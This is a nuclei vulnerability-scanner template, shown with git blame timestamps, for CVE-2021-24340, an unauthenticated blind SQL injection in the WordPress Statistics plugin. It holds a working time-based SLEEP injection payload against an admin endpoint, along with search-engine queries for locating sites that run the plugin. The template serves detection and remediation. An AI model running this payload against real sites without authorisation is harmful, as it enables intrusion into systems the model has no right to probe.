nuclei-templates/http/cves/2021/CVE-2021-24340.yaml

59 lines
2.3 KiB
YAML
Raw Normal View History

2021-07-20 06:36:04 +00:00
id: CVE-2021-24340
2021-05-31 11:59:52 +00:00
2021-05-31 07:23:44 +00:00
info:
name: WordPress Statistics <13.0.8 - Blind SQL Injection
2023-06-10 12:54:46 +00:00
author: lotusdll,j4vaovo
severity: high
description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.
2023-09-06 12:09:01 +00:00
remediation: |
Update to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability.
reference:
2021-05-31 07:23:44 +00:00
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
- https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c
- https://nvd.nist.gov/vuln/detail/CVE-2021-24340
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-24340
cwe-id: CWE-89
2024-05-31 19:23:20 +00:00
epss-score: 0.01606
epss-percentile: 0.8741
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*
2023-06-10 13:00:26 +00:00
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: veronalabs
product: wp_statistics
2023-09-06 12:09:01 +00:00
framework: wordpress
2024-05-31 19:23:20 +00:00
shodan-query: http.html:/wp-content/plugins/wp-statistics/
fofa-query: body=/wp-content/plugins/wp-statistics/
publicwww-query: /wp-content/plugins/wp-statistics/
google-query: inurl:/wp-content/plugins/wp-statistics
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
2021-05-31 07:23:44 +00:00
http:
2023-06-10 12:54:46 +00:00
- raw:
2023-06-12 16:41:40 +00:00
- |
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: {{Hostname}}
2023-06-10 12:54:46 +00:00
- |
@timeout: 15s
GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1
Host: {{Hostname}}
2021-05-31 07:23:44 +00:00
2023-06-12 16:41:40 +00:00
matchers-condition: and
2021-05-31 07:23:44 +00:00
matchers:
2022-04-13 08:51:49 +00:00
- type: dsl
dsl:
2023-06-12 16:41:40 +00:00
- 'status_code_1 == 200'
- 'contains(body_1, "WP Statistics")'
condition: and
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 500'
- 'contains(body_2, ">WordPress &rsaquo; Error<") && contains(body_2, ">Your request is not valid.<")'
2023-06-10 12:54:46 +00:00
condition: and
# digest: 4a0a00473045022100f81cc6ae63a3716745a9d2b7b36392e91421d0e2429ef59ea0be12290d02643302204e0b0cd1ce6bc440c4c53e079c3bc7406fc60f36b6f79cf10bce774aee58942d:922c64590222798bb761d5b6d8e72950